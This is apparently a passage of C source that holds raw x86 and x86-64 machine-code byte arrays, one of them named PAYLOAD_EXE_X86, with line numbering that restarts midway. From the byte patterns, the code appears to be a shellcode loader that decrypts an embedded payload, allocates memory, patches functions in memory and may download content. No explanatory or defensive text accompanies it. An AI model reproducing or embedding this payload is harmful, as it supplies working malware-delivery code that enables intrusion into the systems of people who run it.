1298 | 0x55, 0xfc, 0x4c, 0x8d, 0x04, 0x95, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
1299 | 0x55, 0xe8, 0x4c, 0x01, 0xc2, 0x8b, 0x12, 0x31, 0xca, 0x89, 0x10, 0x83, | |
1300 | 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03, 0x76, 0xb8, 0xc7, 0x45, 0xfc, | |
1301 | 0x00, 0x00, 0x00, 0x00, 0xe9, 0x1c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, | |
1302 | 0xf0, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x04, 0x8b, | |
1303 | 0x00, 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x89, 0x10, 0x48, 0x8b, 0x45, | |
1304 | 0xf0, 0x48, 0x8d, 0x50, 0x04, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, | |
1305 | 0x04, 0x8b, 0x00, 0xc1, 0xc0, 0x05, 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xf0, | |
1306 | 0x8b, 0x00, 0x31, 0xc8, 0x89, 0x02, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, | |
1307 | 0xc0, 0x08, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x0a, | |
1308 | 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x0c, 0x8b, 0x12, 0x01, 0xca, | |
1309 | 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x48, 0x8b, | |
1310 | 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x0c, 0x8b, 0x12, 0x89, 0xd1, 0xc1, 0xc1, | |
1311 | 0x08, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x12, 0x31, | |
1312 | 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x48, | |
1313 | 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x0a, 0x48, 0x8b, 0x55, | |
1314 | 0xf0, 0x48, 0x83, 0xc2, 0x04, 0x8b, 0x12, 0x01, 0xca, 0x89, 0x10, 0x48, | |
1315 | 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0xc1, 0xc0, 0x10, 0x89, 0xc2, 0x48, 0x8b, | |
1316 | 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0x01, 0xc2, 0x48, 0x8b, | |
1317 | 0x45, 0xf0, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x8d, 0x50, 0x0c, | |
1318 | 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0xc1, 0xc0, | |
1319 | 0x0d, 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x31, 0xc8, 0x89, | |
1320 | 0x02, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x04, 0x48, 0x8b, 0x55, | |
1321 | 0xf0, 0x48, 0x83, 0xc2, 0x04, 0x8b, 0x12, 0x89, 0xd1, 0xc1, 0xc1, 0x07, | |
1322 | 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x12, 0x31, 0xca, | |
1323 | 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x8b, | |
1324 | 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x12, 0xc1, 0xc2, 0x10, 0x89, | |
1325 | 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x0f, 0x0f, 0x86, 0xda, | |
1326 | 0xfe, 0xff, 0xff, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x42, | |
1327 | 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, | |
1328 | 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x8b, 0x55, 0xfc, 0x48, 0x8d, 0x0c, | |
1329 | 0x95, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x01, 0xca, | |
1330 | 0x8b, 0x0a, 0x8b, 0x55, 0xfc, 0x4c, 0x8d, 0x04, 0x95, 0x00, 0x00, 0x00, | |
1331 | 0x00, 0x48, 0x8b, 0x55, 0xe8, 0x4c, 0x01, 0xc2, 0x8b, 0x12, 0x31, 0xca, | |
1332 | 0x89, 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03, 0x76, 0xb8, | |
1333 | 0x90, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, | |
1334 | 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, | |
1335 | 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x20, 0x48, | |
1336 | 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xe8, 0xe9, | |
1337 | 0xd4, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb, | |
1338 | 0x1d, 0x8b, 0x45, 0xf4, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x45, 0xe8, 0x48, | |
1339 | 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x88, 0x54, | |
1340 | 0x05, 0xd0, 0x83, 0x45, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x0f, 0x7e, 0xdd, | |
1341 | 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8, | |
1342 | 0x9c, 0xfd, 0xff, 0xff, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x83, 0x7d, | |
1343 | 0x28, 0x10, 0x48, 0x0f, 0x46, 0x45, 0x28, 0x89, 0x45, 0xe4, 0xc7, 0x45, | |
1344 | 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x2f, 0x8b, 0x45, 0xf4, 0x48, 0x63, | |
1345 | 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x48, | |
1346 | 0x63, 0xc8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x01, 0xc8, 0x0f, 0xb6, 0x08, | |
1347 | 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x0f, 0xb6, 0x44, 0x05, 0xd0, 0x31, 0xc8, | |
1348 | 0x88, 0x02, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x45, 0xf4, 0x3b, 0x45, 0xe4, | |
1349 | 0x7c, 0xc9, 0x8b, 0x45, 0xe4, 0x48, 0x98, 0x48, 0x29, 0x45, 0x28, 0x8b, | |
1350 | 0x45, 0xe4, 0x48, 0x98, 0x48, 0x01, 0x45, 0xf8, 0xc7, 0x45, 0xf4, 0x10, | |
1351 | 0x00, 0x00, 0x00, 0xeb, 0x25, 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x48, 0x8d, | |
1352 | 0x50, 0xff, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, | |
1353 | 0x83, 0xc2, 0x01, 0x88, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x02, | |
1354 | 0xeb, 0x0a, 0x83, 0x6d, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x00, 0x7f, 0xd5, | |
1355 | 0x48, 0x83, 0x7d, 0x28, 0x00, 0x0f, 0x85, 0x21, 0xff, 0xff, 0xff, 0x90, | |
1356 | 0x48, 0x83, 0xc4, 0x50, 0x5d, 0xc3, 0x90, 0x90, 0xff, 0xff, 0xff, 0xff, | |
1357 | 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
1358 | 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, | |
1359 | 0x00, 0x00, 0x00, 0x00}; | |
1360 |
0 | ||
1 | unsigned char PAYLOAD_EXE_X86[] = { | |
2 | 0x83, 0xec, 0x20, 0x53, 0x55, 0x56, 0x57, 0x8b, 0x7c, 0x24, 0x34, 0xff, | |
3 | 0x77, 0x2c, 0xff, 0x77, 0x28, 0xff, 0x77, 0x4c, 0xff, 0x77, 0x48, 0x57, | |
4 | 0xe8, 0xd1, 0x1a, 0x00, 0x00, 0xff, 0x77, 0x2c, 0x8b, 0xf0, 0xff, 0x77, | |
5 | 0x28, 0xff, 0x77, 0x54, 0xff, 0x77, 0x50, 0x57, 0xe8, 0xbd, 0x1a, 0x00, | |
6 | 0x00, 0x83, 0xc4, 0x28, 0x8b, 0xd8, 0x89, 0x5c, 0x24, 0x34, 0x85, 0xf6, | |
7 | 0x0f, 0x84, 0x15, 0x02, 0x00, 0x00, 0x85, 0xdb, 0x0f, 0x84, 0x0d, 0x02, | |
8 | 0x00, 0x00, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x37, 0x6a, | |
9 | 0x00, 0xff, 0xd6, 0x8b, 0xf0, 0x85, 0xf6, 0x0f, 0x84, 0xf6, 0x01, 0x00, | |
10 | 0x00, 0xff, 0x37, 0x57, 0x56, 0xe8, 0x17, 0x1d, 0x00, 0x00, 0x6a, 0x20, | |
11 | 0x8d, 0x44, 0x24, 0x20, 0x6a, 0x00, 0x50, 0xe8, 0x2d, 0x1d, 0x00, 0x00, | |
12 | 0x8b, 0x06, 0x8d, 0xae, 0x30, 0x02, 0x00, 0x00, 0x2d, 0x30, 0x02, 0x00, | |
13 | 0x00, 0x50, 0x55, 0x8d, 0x46, 0x14, 0x50, 0x8d, 0x46, 0x04, 0x50, 0xe8, | |
14 | 0xec, 0x1b, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8d, 0x86, 0x18, 0x06, 0x00, | |
15 | 0x00, 0xff, 0x76, 0x28, 0x50, 0xe8, 0xb5, 0x1a, 0x00, 0x00, 0x83, 0xc4, | |
16 | 0x34, 0x3b, 0x86, 0x18, 0x07, 0x00, 0x00, 0x0f, 0x85, 0x4f, 0x01, 0x00, | |
17 | 0x00, 0x3b, 0x96, 0x1c, 0x07, 0x00, 0x00, 0x0f, 0x85, 0x43, 0x01, 0x00, | |
18 | 0x00, 0xff, 0x76, 0x2c, 0xff, 0x76, 0x28, 0xff, 0x76, 0x34, 0xff, 0x76, | |
19 | 0x30, 0x56, 0xe8, 0x1b, 0x1a, 0x00, 0x00, 0x83, 0xc4, 0x14, 0x89, 0x46, | |
20 | 0x30, 0x85, 0xc0, 0x0f, 0x84, 0x76, 0x01, 0x00, 0x00, 0x33, 0xff, 0x39, | |
21 | 0xbe, 0x34, 0x02, 0x00, 0x00, 0x76, 0x16, 0x8d, 0x9e, 0x38, 0x02, 0x00, | |
22 | 0x00, 0x53, 0xff, 0x56, 0x30, 0x47, 0x83, 0xc3, 0x20, 0x3b, 0xbe, 0x34, | |
23 | 0x02, 0x00, 0x00, 0x72, 0xf0, 0x33, 0xdb, 0x43, 0x39, 0x5d, 0x00, 0x76, | |
24 | 0x34, 0x8d, 0x6e, 0x34, 0x8d, 0x7e, 0x38, 0xff, 0x76, 0x2c, 0xff, 0x76, | |
25 | 0x28, 0xff, 0x77, 0x04, 0xff, 0x37, 0x56, 0xe8, 0xce, 0x19, 0x00, 0x00, | |
26 | 0x83, 0xc4, 0x14, 0x89, 0x45, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xd2, 0x00, | |
27 | 0x00, 0x00, 0x43, 0x83, 0xc7, 0x08, 0x83, 0xc5, 0x04, 0x3b, 0x9e, 0x30, | |
28 | 0x02, 0x00, 0x00, 0x72, 0xd2, 0x8b, 0x86, 0x0c, 0x05, 0x00, 0x00, 0x6a, | |
29 | 0x02, 0x5b, 0x3b, 0xc3, 0x75, 0x15, 0x56, 0xe8, 0x29, 0x05, 0x00, 0x00, | |
30 | 0x59, 0x85, 0xc0, 0x0f, 0x84, 0xa7, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x0c, | |
31 | 0x05, 0x00, 0x00, 0x8d, 0xbe, 0x48, 0x07, 0x00, 0x00, 0x83, 0xf8, 0x01, | |
32 | 0x74, 0x02, 0x8b, 0x3f, 0x83, 0xbe, 0x40, 0x03, 0x00, 0x00, 0x01, 0x74, | |
33 | 0x26, 0x56, 0xe8, 0x32, 0x03, 0x00, 0x00, 0x59, 0x85, 0xc0, 0x75, 0x08, | |
34 | 0x39, 0x9e, 0x40, 0x03, 0x00, 0x00, 0x74, 0x78, 0x56, 0xe8, 0x05, 0x04, | |
35 | 0x00, 0x00, 0x59, 0x85, 0xc0, 0x75, 0x08, 0x39, 0x9e, 0x40, 0x03, 0x00, | |
36 | 0x00, 0x74, 0x65, 0x83, 0x3f, 0x03, 0x74, 0x59, 0x83, 0x3f, 0x04, 0x74, | |
37 | 0x54, 0x83, 0x3f, 0x01, 0x74, 0x23, 0x39, 0x1f, 0x74, 0x1f, 0x83, 0x3f, | |
38 | 0x05, 0x74, 0x12, 0x83, 0x3f, 0x06, 0x74, 0x0d, 0x83, 0x3f, 0x07, 0x75, | |
39 | 0x43, 0x56, 0xe8, 0xe5, 0x17, 0x00, 0x00, 0xeb, 0x3a, 0x56, 0xe8, 0x4c, | |
40 | 0x16, 0x00, 0x00, 0xeb, 0x32, 0x8d, 0x44, 0x24, 0x10, 0x50, 0x56, 0xe8, | |
41 | 0xe7, 0x0c, 0x00, 0x00, 0x59, 0x59, 0x85, 0xc0, 0x74, 0x0d, 0x8d, 0x44, | |
42 | 0x24, 0x10, 0x50, 0x56, 0xe8, 0xe1, 0x0e, 0x00, 0x00, 0x59, 0x59, 0x8d, | |
43 | 0x44, 0x24, 0x10, 0x50, 0x56, 0xe8, 0x5d, 0x08, 0x00, 0x00, 0x59, 0xeb, | |
44 | 0x06, 0x56, 0xe8, 0x91, 0x11, 0x00, 0x00, 0x59, 0x8b, 0x5c, 0x24, 0x34, | |
45 | 0x83, 0xbe, 0x0c, 0x05, 0x00, 0x00, 0x02, 0xbf, 0x00, 0xc0, 0x00, 0x00, | |
46 | 0x75, 0x2e, 0x8b, 0x86, 0x48, 0x07, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x24, | |
47 | 0xff, 0xb6, 0x40, 0x07, 0x00, 0x00, 0x6a, 0x00, 0x50, 0xe8, 0x7b, 0x1b, | |
48 | 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x57, 0x6a, 0x00, 0xff, 0xb6, 0x48, 0x07, | |
49 | 0x00, 0x00, 0xff, 0x56, 0x40, 0x83, 0xa6, 0x48, 0x07, 0x00, 0x00, 0x00, | |
50 | 0xff, 0x36, 0x6a, 0x00, 0x56, 0xe8, 0x5b, 0x1b, 0x00, 0x00, 0x83, 0xc4, | |
51 | 0x0c, 0x57, 0x6a, 0x00, 0x56, 0xff, 0xd3, 0x33, 0xc0, 0xeb, 0x03, 0x83, | |
52 | 0xc8, 0xff, 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x20, 0xc3, 0x8b, 0x44, | |
53 | 0x24, 0x04, 0x83, 0xc0, 0x04, 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2, 0x04, | |
54 | 0x00, 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x55, 0x8b, 0xec, 0xf6, 0x45, 0x10, | |
55 | 0x02, 0x56, 0x8b, 0x75, 0x08, 0x57, 0x74, 0x15, 0x8b, 0x7d, 0x18, 0x85, | |
56 | 0xff, 0x74, 0x1b, 0x8b, 0x46, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x04, | |
57 | 0x8b, 0x46, 0x14, 0x89, 0x07, 0xf6, 0x45, 0x10, 0x01, 0x74, 0x19, 0x8b, | |
58 | 0x7d, 0x14, 0x85, 0xff, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, | |
59 | 0x0d, 0x83, 0xc6, 0x0c, 0x56, 0x8b, 0x06, 0xff, 0x50, 0x04, 0x89, 0x37, | |
60 | 0x33, 0xc0, 0x5f, 0x5e, 0x5d, 0xc2, 0x14, 0x00, 0x8b, 0x44, 0x24, 0x04, | |
61 | 0x8b, 0x40, 0x28, 0xff, 0x50, 0x54, 0x8b, 0x4c, 0x24, 0x08, 0x89, 0x01, | |
62 | 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x56, 0x57, 0xe8, 0x08, 0x18, 0x00, 0x00, | |
63 | 0x8b, 0x74, 0x24, 0x10, 0xb9, 0x13, 0x14, 0x40, 0x00, 0xbf, 0xe4, 0x2a, | |
64 | 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x08, 0xe8, 0xed, | |
65 | 0x17, 0x00, 0x00, 0xb9, 0x62, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, | |
66 | 0x8b, 0x06, 0x89, 0x48, 0x04, 0xe8, 0xda, 0x17, 0x00, 0x00, 0xb9, 0x72, | |
67 | 0x14, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x08, | |
68 | 0xe8, 0xc7, 0x17, 0x00, 0x00, 0xb9, 0xc0, 0x12, 0x40, 0x00, 0x2b, 0xcf, | |
69 | 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x0c, 0xe8, 0xb4, 0x17, 0x00, 0x00, | |
70 | 0xb9, 0x76, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, | |
71 | 0x48, 0x10, 0xe8, 0xa1, 0x17, 0x00, 0x00, 0xb9, 0x71, 0x12, 0x40, 0x00, | |
72 | 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x14, 0xe8, 0x8e, 0x17, | |
73 | 0x00, 0x00, 0xb9, 0x0e, 0x14, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, | |
74 | 0x06, 0x89, 0x48, 0x18, 0xe8, 0x7b, 0x17, 0x00, 0x00, 0xb9, 0x71, 0x12, | |
75 | 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x1c, 0xe8, | |
76 | 0x68, 0x17, 0x00, 0x00, 0xb9, 0xc3, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, | |
77 | 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x20, 0xe8, 0x55, 0x17, 0x00, 0x00, 0xb9, | |
78 | 0xbe, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, | |
79 | 0x24, 0xe8, 0x42, 0x17, 0x00, 0x00, 0xb9, 0xbe, 0x13, 0x40, 0x00, 0x2b, | |
80 | 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x5f, 0x89, 0x48, 0x28, 0x8b, 0x44, 0x24, | |
81 | 0x08, 0x83, 0x66, 0x04, 0x00, 0x89, 0x46, 0x28, 0x5e, 0xc3, 0x33, 0xc0, | |
82 | 0xc2, 0x04, 0x00, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x2c, 0x33, 0xc0, 0x56, | |
83 | 0x6a, 0x20, 0x50, 0x89, 0x45, 0xf4, 0x89, 0x45, 0xf8, 0x89, 0x45, 0xfc, | |
84 | 0x8d, 0x45, 0xd4, 0x50, 0xe8, 0xc4, 0x19, 0x00, 0x00, 0x8b, 0x75, 0x0c, | |
85 | 0x8d, 0x4d, 0xd4, 0x83, 0xc4, 0x0c, 0x8b, 0x06, 0x51, 0x56, 0xff, 0x50, | |
86 | 0x0c, 0x85, 0xc0, 0x75, 0x12, 0x8b, 0x06, 0x8d, 0x4d, 0xfc, 0x51, 0x8d, | |
87 | 0x4d, 0xf8, 0x51, 0x8d, 0x4d, 0xf4, 0x51, 0x56, 0xff, 0x50, 0x10, 0x33, | |
88 | 0xc0, 0x5e, 0xc9, 0xc2, 0x08, 0x00, 0x33, 0xc0, 0xc2, 0x0c, 0x00, 0x8b, | |
89 | 0x4c, 0x24, 0x0c, 0x85, 0xc9, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, | |
90 | 0xeb, 0x4d, 0x53, 0x8b, 0x5c, 0x24, 0x0c, 0x33, 0xd2, 0x56, 0x8b, 0x74, | |
91 | 0x24, 0x0c, 0x57, 0x8b, 0x7e, 0x28, 0x8b, 0x84, 0x97, 0xfc, 0x03, 0x00, | |
92 | 0x00, 0x3b, 0x04, 0x93, 0x75, 0x08, 0x42, 0x83, 0xfa, 0x04, 0x75, 0xee, | |
93 | 0xeb, 0x14, 0x33, 0xd2, 0x8b, 0x84, 0x97, 0xac, 0x04, 0x00, 0x00, 0x3b, | |
94 | 0x04, 0x93, 0x75, 0x10, 0x42, 0x83, 0xfa, 0x04, 0x75, 0xee, 0x89, 0x31, | |
95 | 0xf0, 0xff, 0x46, 0x04, 0x33, 0xc0, 0xeb, 0x08, 0x83, 0x21, 0x00, 0xb8, | |
96 | 0x02, 0x40, 0x00, 0x80, 0x5f, 0x5e, 0x5b, 0xc2, 0x0c, 0x00, 0x8b, 0x4c, | |
97 | 0x24, 0x04, 0x83, 0xc8, 0xff, 0xf0, 0x0f, 0xc1, 0x41, 0x04, 0x48, 0xc2, | |
98 | 0x04, 0x00, 0x8b, 0x44, 0x24, 0x18, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2, | |
99 | 0x18, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x0f, 0xaf, 0x44, 0x24, 0x08, 0xc3, | |
100 | 0x8b, 0x44, 0x24, 0x14, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2, 0x14, 0x00, | |
101 | 0x8b, 0x44, 0x24, 0x04, 0x03, 0x44, 0x24, 0x08, 0xc3, 0x51, 0x53, 0x56, | |
102 | 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x86, 0x38, 0x03, 0x00, 0x00, 0x50, 0xff, | |
103 | 0x56, 0x30, 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x06, 0x40, 0xe9, 0xc5, 0x00, | |
104 | 0x00, 0x00, 0x55, 0x57, 0x8d, 0x86, 0xac, 0x03, 0x00, 0x00, 0x50, 0x53, | |
105 | 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xaa, 0x00, 0x00, | |
106 | 0x00, 0xbf, 0x8e, 0x14, 0x40, 0x00, 0x81, 0xef, 0x82, 0x14, 0x40, 0x00, | |
107 | 0x0f, 0x88, 0x99, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, | |
108 | 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x85, 0x00, | |
109 | 0x00, 0x00, 0x57, 0xe8, 0xd8, 0x15, 0x00, 0x00, 0xb9, 0x82, 0x14, 0x40, | |
110 | 0x00, 0x81, 0xe9, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc1, 0x50, 0x55, 0xe8, | |
111 | 0x61, 0x18, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50, | |
112 | 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x8d, 0x86, 0xbc, | |
113 | 0x03, 0x00, 0x00, 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed, | |
114 | 0x74, 0x49, 0xbf, 0xa4, 0x14, 0x40, 0x00, 0xbb, 0x98, 0x14, 0x40, 0x00, | |
115 | 0x2b, 0xfb, 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x40, 0x57, | |
116 | 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8, 0x7e, 0x15, | |
117 | 0x00, 0x00, 0x81, 0xeb, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc3, 0x50, 0x55, | |
118 | 0xe8, 0x0c, 0x18, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, | |
119 | 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x33, 0xc0, | |
120 | 0x40, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59, 0xc3, 0x51, | |
121 | 0x53, 0x56, 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x86, 0x4c, 0x03, 0x00, 0x00, | |
122 | 0x50, 0xff, 0x56, 0x30, 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x06, 0x40, 0xe9, | |
123 | 0xc5, 0x00, 0x00, 0x00, 0x55, 0x57, 0x8d, 0x86, 0x5c, 0x03, 0x00, 0x00, | |
124 | 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xaa, | |
125 | 0x00, 0x00, 0x00, 0xbf, 0xda, 0x2a, 0x40, 0x00, 0x81, 0xef, 0x0e, 0x14, | |
126 | 0x40, 0x00, 0x0f, 0x88, 0x99, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x18, | |
127 | 0x50, 0x6a, 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f, 0x84, | |
128 | 0x85, 0x00, 0x00, 0x00, 0x57, 0xe8, 0xf2, 0x14, 0x00, 0x00, 0xb9, 0x0e, | |
129 | 0x14, 0x40, 0x00, 0x81, 0xe9, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc1, 0x50, | |
130 | 0x55, 0xe8, 0x7b, 0x17, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, | |
131 | 0x10, 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x8d, | |
132 | 0x86, 0x7c, 0x03, 0x00, 0x00, 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8, | |
133 | 0x85, 0xed, 0x74, 0x49, 0xbf, 0xd1, 0x2a, 0x40, 0x00, 0xbb, 0xc2, 0x2a, | |
134 | 0x40, 0x00, 0x2b, 0xfb, 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, | |
135 | 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8, | |
136 | 0x98, 0x14, 0x00, 0x00, 0x81, 0xeb, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc3, | |
137 | 0x50, 0x55, 0xe8, 0x26, 0x17, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, | |
138 | 0x24, 0x10, 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, | |
139 | 0x33, 0xc0, 0x40, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59, | |
140 | 0xc3, 0x81, 0xec, 0x58, 0x02, 0x00, 0x00, 0x53, 0x56, 0x57, 0x6a, 0x3c, | |
141 | 0x5f, 0x33, 0xf6, 0x8d, 0x44, 0x24, 0x28, 0x57, 0x56, 0x50, 0x89, 0x74, | |
142 | 0x24, 0x20, 0xbb, 0x00, 0x02, 0x60, 0x84, 0xe8, 0x09, 0x17, 0x00, 0x00, | |
143 | 0x8d, 0x44, 0x24, 0x70, 0x89, 0x7c, 0x24, 0x34, 0x8b, 0xbc, 0x24, 0x74, | |
144 | 0x02, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x89, 0x44, 0x24, 0x38, 0x8d, 0x84, | |
145 | 0x24, 0x64, 0x01, 0x00, 0x00, 0x89, 0x44, 0x24, 0x54, 0xb8, 0x00, 0x01, | |
146 | 0x00, 0x00, 0x89, 0x44, 0x24, 0x3c, 0x89, 0x44, 0x24, 0x58, 0x8d, 0x44, | |
147 | 0x24, 0x28, 0x50, 0x68, 0x00, 0x00, 0x00, 0x10, 0x56, 0x8d, 0x87, 0x10, | |
148 | 0x05, 0x00, 0x00, 0x50, 0xff, 0x57, 0x7c, 0x85, 0xc0, 0x0f, 0x84, 0xb4, | |
149 | 0x01, 0x00, 0x00, 0x33, 0xc0, 0x83, 0x7c, 0x24, 0x34, 0x04, 0x56, 0x56, | |
150 | 0x0f, 0x94, 0xc0, 0x56, 0x89, 0x44, 0x24, 0x1c, 0xb8, 0x00, 0x32, 0xe0, | |
151 | 0x84, 0x56, 0x56, 0x0f, 0x44, 0xd8, 0xff, 0x97, 0x80, 0x00, 0x00, 0x00, | |
152 | 0x8b, 0xc8, 0x89, 0x4c, 0x24, 0x24, 0x85, 0xc9, 0x0f, 0x84, 0x85, 0x01, | |
